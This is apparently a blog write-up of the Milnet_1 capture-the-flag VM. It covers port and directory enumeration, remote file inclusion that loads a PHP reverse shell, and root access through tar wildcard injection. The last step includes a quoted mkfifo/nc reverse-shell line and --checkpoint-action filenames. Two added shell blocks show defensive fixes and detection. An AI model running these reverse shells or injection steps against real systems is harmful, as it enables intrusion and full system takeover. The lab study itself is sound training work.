Milnet_1 VM

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.136
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:56 EDT
Nmap scan report for 192.1.1.136
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:73:48:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 11.73 seconds

Ports 22 and 80 are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.1.1.136
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:57 EDT
Nmap scan report for 192.1.1.136
Host is up (0.00044s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9b:b5:21:38:96:7f:85:bd:1b:aa:9a:70:cf:db:cd:36 (RSA)
| 256 93:30:be:c2:af:dd:81:a8:25:2b:57:e5:01:49:91:57 (ECDSA)
|_ 256 37:40:2b:cc:27:ae:89:22:d0:d2:65:65:c4:9b:53:42 (ED25519)
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
MAC Address: 00:0C:29:73:48:B8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.60 seconds

Ubuntu operating system, web server is lighttpd 1.4.35.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.136
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:58 EDT
Nmap scan report for 192.1.1.136
Host is up (0.00033s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.1.1.136
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.1.1.136:80/nav.php
| Form id:
| Form action: content.php
|
| Path: http://192.1.1.136:80/nav.php
| Form id:
| Form action: content.php
|
| Path: http://192.1.1.136:80/nav.php
| Form id:
|_ Form action: content.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
|_ /info.php: Possible information file
MAC Address: 00:0C:29:73:48:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 87.41 seconds

Enumeration turned up info.php; next, try directory brute-forcing.

┌──(kali㉿kali)-[~]
└─$ sudo feroxbuster -u http://192.1.1.136 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,rar,zip,gz,sql,jpg

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.1.1.136
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, rar, zip, gz, sql, jpg]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 11l 28w 345c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 8l 14w 145c http://192.1.1.136/index.php
200 GET 4l 11w 109c http://192.1.1.136/main.php
200 GET 14l 38w 532c http://192.1.1.136/nav.php
200 GET 8l 14w 145c http://192.1.1.136/
200 GET 5l 11w 110c http://192.1.1.136/content.php
200 GET 127l 336w 34456c http://192.1.1.136/mj.jpg
200 GET 700l 3645w 64174c http://192.1.1.136/info.php
200 GET 425l 1948w 128991c http://192.1.1.136/bomb.jpg
200 GET 28l 536w 3901c http://192.1.1.136/bomb.php
200 GET 12l 37w 253c http://192.1.1.136/props.php
403 GET 11l 26w 345c http://192.1.1.136/%7Echeckout%7E
[####################] - 87s 1543892/1543892 0s found:11 errors:2
[####################] - 87s 1543822/1543822 17765/s http://192.1.1.136/

Looking at the web interface

Start with the default page. The images here could also carry steganography; if no other attack path turns up, don't skip checking the images for hidden data.

The three buttons on the left are nav.php, the picture on the right is main.php. Capture the requests with Burp Suite and click each of the three buttons.

nav.php calls content.php using POST, and each button submits a different POST value. The bomb button returns a long text "tutorial" on building an atomic bomb. The key observation: the POST value with a .php suffix appended matches exactly a file found in the directory scan, which suggests a file inclusion vulnerability.

File inclusion vulnerability

Try ../../../../../../../etc/passwd to test for local file inclusion. The response is empty, probably because a .php suffix is appended by default. Try remote file inclusion instead.
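The include bug above is worth looking at from the fixing side. The following is an added example, not code from the original post and not the VM's own content.php: a POSIX shell version of the two checks a corrected include handler needs, an identifier-only allowlist followed by a realpath containment check, plus a helper that reports whether allow_url_include is switched on in a php.ini. The web root, the page names in the allowlist, the symlinked props.php and the php.ini line are all constructed here so the block runs offline; the attacker host in the demo input is a documentation address.

```shell
#!/bin/sh
# Added example, not code from the original post or from the VM's content.php.
# content.php on this VM appends ".php" to a POST value and includes the
# result. That happens to block "../../etc/passwd" (there is no passwd.php),
# but "http://attacker/x" becomes "http://attacker/x.php", which is still a
# valid include target when allow_url_include is on. The two functions below
# are the checks a fixed handler needs, written in POSIX sh so they run here.

# safe_include_path ROOT NAME
# Prints the resolved path and returns 0 when NAME may be included, else 1.
safe_include_path() {
    root=$1
    name=$2
    # 1. Only a bare identifier is acceptable: no "/", ":", "." or spaces,
    #    which rules out traversal and URLs before any file system access.
    case $name in
        ''|*[!A-Za-z0-9_-]*) return 1 ;;
    esac
    # 2. Allowlist of pages the navigation may load (assumed set, taken from
    #    the page names the directory scan found on this VM).
    case $name in
        main|content|bomb|props) ;;
        *) return 1 ;;
    esac
    candidate="$root/$name.php"
    [ -f "$candidate" ] || return 1
    # 3. Resolve symlinks and confirm the file still lives under the web root.
    real=$(realpath "$candidate") || return 1
    realroot=$(realpath "$root") || return 1
    case $real in
        "$realroot"/*) printf '%s\n' "$real"; return 0 ;;
        *) return 1 ;;
    esac
}

# php_url_include_enabled INI_FILE
# Returns 0 if allow_url_include is switched on in the given php.ini, the
# setting that turns an include bug like this one into remote code execution.
php_url_include_enabled() {
    grep -Eiq '^[[:space:]]*allow_url_include[[:space:]]*=[[:space:]]*(on|1|true|yes)' "$1"
}

# --- constructed sample web root and php.ini so the block runs offline ---
demo_root=$(mktemp -d)
for f in index main content bomb; do
    printf '<?php /* constructed stub */ ?>\n' > "$demo_root/$f.php"
done
# props.php is made a symlink that escapes the web root: the name passes the
# allowlist, so only the realpath check can catch it.
ln -s /etc/hostname "$demo_root/props.php"
printf 'allow_url_include = On\n' > "$demo_root/php.ini"

demo() {
    for n in main bomb props '../../../../../../../etc/passwd' \
             'http://192.0.2.10/shell' 'main.php' ''; do
        if p=$(safe_include_path "$demo_root" "$n"); then
            printf 'ALLOW "%s" -> %s\n' "$n" "$p"
        else
            printf 'DENY  "%s"\n' "$n"
        fi
    done
    if php_url_include_enabled "$demo_root/php.ini"; then
        echo "php.ini: allow_url_include is On, remote includes are possible"
    fi
}
demo
```

The order of the checks matters: the identifier test runs before anything touches the file system, the allowlist is the actual authorization decision, and the realpath comparison is the safety net for symlinks inside the web root. Appending a suffix, as the VM does, is none of these and only narrows which files can be reached.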

┌──(kali㉿kali)-[~/Downloads/milnet/CVE-2018-15473]
└─$ vim php-reverse-shell.php

┌──(kali㉿kali)-[~/Downloads/milnet/CVE-2018-15473]
└─$ python -m http.server 8088
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...
192.1.1.136 - - [18/Jul/2023 04:37:07] "GET /php-reverse-shell.php HTTP/1.0" 200 -

Reverse shell obtained

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
[sudo] password for kali:
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.136] 53824
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
10:37:07 up 1 day, 5:04, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 1: python: not found
$ which python2
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@seckenheim:/$ whoami
whoami
www-data
www-data@seckenheim:/$ sudo -l
sudo -l
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts
www-data@seckenheim:/$ uname -a
uname -a
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@seckenheim:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:73:48:b8 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.136/24 brd 192.1.1.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe73:48b8/64 scope link
valid_lft forever preferred_lft forever
www-data@seckenheim:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

Look at the files under the web root

www-data@seckenheim:/var/www/html$ ls -laih
ls -laih
total 132K
661465 drwxr-xr-x 2 www-data www-data 4.0K Jul 18 08:36 .
661464 drwxr-xr-x 3 root root 4.0K May 21 2016 ..
661702 -rw-r--r-- 1 root root 72K Aug 6 2015 bomb.jpg
661721 -rw-r--r-- 1 root root 3.9K May 21 2016 bomb.php
661718 -rw-r--r-- 1 root root 124 May 21 2016 content.php
657852 -rw-r--r-- 1 root root 3.3K Jul 18 08:36 index.lighttpd.html
661713 -rw-r--r-- 1 root root 145 May 21 2016 index.php
661709 -rw-r--r-- 1 www-data www-data 20 May 21 2016 info.php
661717 -rw-r--r-- 1 root root 109 May 21 2016 main.php
661427 -rw-r--r-- 1 root root 18K Jan 22 2012 mj.jpg
655384 -rw-r--r-- 1 root root 532 May 21 2016 nav.php
655381 -rw-r--r-- 1 root root 253 May 22 2016 props.php

Look at the home directory

www-data@seckenheim:/home/langman$ ls -alih
ls -alih
total 40K
1051087 drwxr-xr-x 4 langman langman 4.0K May 21 2016 .
1048577 drwxr-xr-x 3 root root 4.0K May 21 2016 ..
1048584 -rw------- 1 langman langman 6 May 22 2016 .bash_history
1051088 -rw-r--r-- 1 langman langman 220 May 21 2016 .bash_logout
1051090 -rw-r--r-- 1 langman langman 3.7K May 21 2016 .bashrc
1048581 drwx------ 2 langman langman 4.0K May 21 2016 .cache
1051089 -rw-r--r-- 1 langman langman 675 May 21 2016 .profile
1048596 -rw------- 1 langman langman 4.4K May 21 2016 .viminfo
1048591 drwxrwxr-x 2 langman langman 4.0K May 21 2016 SDINET
www-data@seckenheim:/home/langman$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
*/1 * * * * root /backup/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

There is a cron job running /backup/backup.sh as root every minute.

www-data@seckenheim:/$ ls -liah /backup/backup.sh
ls -liah /backup/backup.sh
655377 -rw-r--r-x 1 root root 57 May 21 2016 /backup/backup.sh
www-data@seckenheim:/$ cat /backup/backup.sh
cat /backup/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

tar wildcard privilege escalation

The tar command is run with an unquoted wildcard. A search for "tar wildcard privilege escalation" turns up a blog post:

Linux local privilege escalation via wildcards (利用通配符进行Linux本地提权) - FreeBuf

The wildcard injection technique:

echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
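To make the root cause and the fix concrete, here is an added example that is not the VM's /backup/backup.sh and not code from the FreeBuf article. It places the weak backup job beside a hardened one and runs both in a constructed temp directory standing in for /var/www/html: the option-like filenames are created as labelled stand-ins, and the checkpoint action only drops a marker file, so whether tar executed something from the archived directory can be observed directly. It also includes a check for option-like entry names that a root cron job should refuse to proceed on. The directory layout, file names and marker are all constructed.

```shell
#!/bin/sh
# Added example, not the VM's /backup/backup.sh and not code from the FreeBuf
# article. It puts the weak backup job next to a hardened one and runs both
# in a constructed temp directory. The option-like filenames are created as
# labelled stand-ins, and the checkpoint action only creates a marker file,
# so whether the job executed a file from the archived directory can be
# observed directly.

# vulnerable_backup SRC ARCHIVE: the pattern from the cron job. The shell
# expands * and GNU tar accepts options after operands, so an entry named
# --checkpoint=1 is parsed as an option instead of being archived as a file.
vulnerable_backup() {
    (cd "$1" && tar cf "$2" *)
}

# hardened_backup SRC ARCHIVE: no glob at all. tar is pointed at the
# directory with -C and archives ".", so no entry name reaches its option
# parser. "tar cf ARCHIVE -- *" or "tar cf ARCHIVE ./*" fix the same bug;
# what matters is that no operand can start with "-".
hardened_backup() {
    tar cf "$2" -C "$1" .
}

# option_like_names DIR: print top-level entries whose name starts with "-".
# A root cron job should refuse to archive a directory others can write to
# when it contains any, and their appearance is a cheap detection signal.
option_like_names() {
    for f in "$1"/* "$1"/.[!.]*; do
        [ -e "$f" ] || continue
        case ${f##*/} in
            -*) printf '%s\n' "${f##*/}" ;;
        esac
    done
}
count_option_like() { option_like_names "$1" | wc -l | tr -d ' '; }

# --- constructed directory standing in for /var/www/html ---
work=$(mktemp -d)
src="$work/html"
mkdir "$src"
printf '<?php /* constructed */ ?>\n' > "$src/index.php"
# Stand-in for the dropped script: it only records that it ran.
printf 'touch "%s/FIRED"\n' "$work" > "$src/shell.sh"
: > "$src/--checkpoint=1"
: > "$src/--checkpoint-action=exec=sh shell.sh"

# Each returns 0 if the marker appeared, i.e. the job executed shell.sh.
weak_job_fires() {
    rm -f "$work/FIRED"
    vulnerable_backup "$src" "$work/weak.tar"
    [ -e "$work/FIRED" ]
}
hardened_job_fires() {
    rm -f "$work/FIRED"
    hardened_backup "$src" "$work/fixed.tar"
    [ -e "$work/FIRED" ]
}

if weak_job_fires; then
    echo "weak job: shell.sh was executed by tar"
else
    echo "weak job: nothing executed (non-GNU tar, or POSIXLY_CORRECT set)"
fi
if hardened_job_fires; then
    echo "hardened job: shell.sh was executed (unexpected)"
else
    echo "hardened job: nothing executed"
fi
echo "option-like entries in $src: $(count_option_like "$src")"
```

The vulnerable branch only fires with GNU tar, which is what the VM runs; the hardened branch never fires regardless of tar implementation, because tar is handed a single operand, ".", that it constructs itself. The same reasoning applies to any root cron job that globs over a directory the web server user can write to: the glob is the bug, and the backup script being root-owned and read-only does not help.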

Privilege escalation succeeded

┌──(kali㉿kali)-[~/Downloads/milnet]
└─$ sudo nc -lvnp 8888
[sudo] password for kali:
listening on [any] 8888 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.136] 48100
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
credits.txt
cat credit.txt
cat: credit.txt: No such file or directory
cat credits.txt
,----,
,/ .`|
,` .' : ,---, ,---,.
; ; /,--.' | ,' .' | ,---,
.'___,/ ,' | | : ,---.' | ,---, ,---.'|
| : | : : : | | .' ,-+-. / | | | :
; |.'; ; : | |,--. ,---. : : |-, ,--.'|' | | | |
`----' | | | : ' | / \ : | ;/|| | ,\' | ,--.__| |
' : ; | | /' : / / | | : .'| | / | | / ,' |
| | ' ' : | | |. ' / | | | |-,| | | | |. ' / |
' : | | | ' | :' ; /| ' : ;/|| | | |/ ' ; |: |
; |.' | : :_:,'' | / | | | \| | |--' | | '/ '
'---' | | ,' | : | | : .'| |/ | : :|
`--'' \ \ / | | ,' '---' \ \ /
`----' `----' `----'


This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!

If you liked it drop me a line on twitter or in #vulnhub.

I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...

This VM was inspired by The Cuckoo's Egg.
If you have not read it give it a try:
http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787/
uname -a
Linux seckenheim.net.mil 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:0c:29:73:48:b8 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.136/24 brd 192.1.1.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe73:48b8/64 scope link
valid_lft forever preferred_lft forever

Milnet_1 VM
https://i3eg1nner.github.io/2023/07/b6c4e7bd4006.html
Author: I3eg1nner
Published: July 18, 2023
License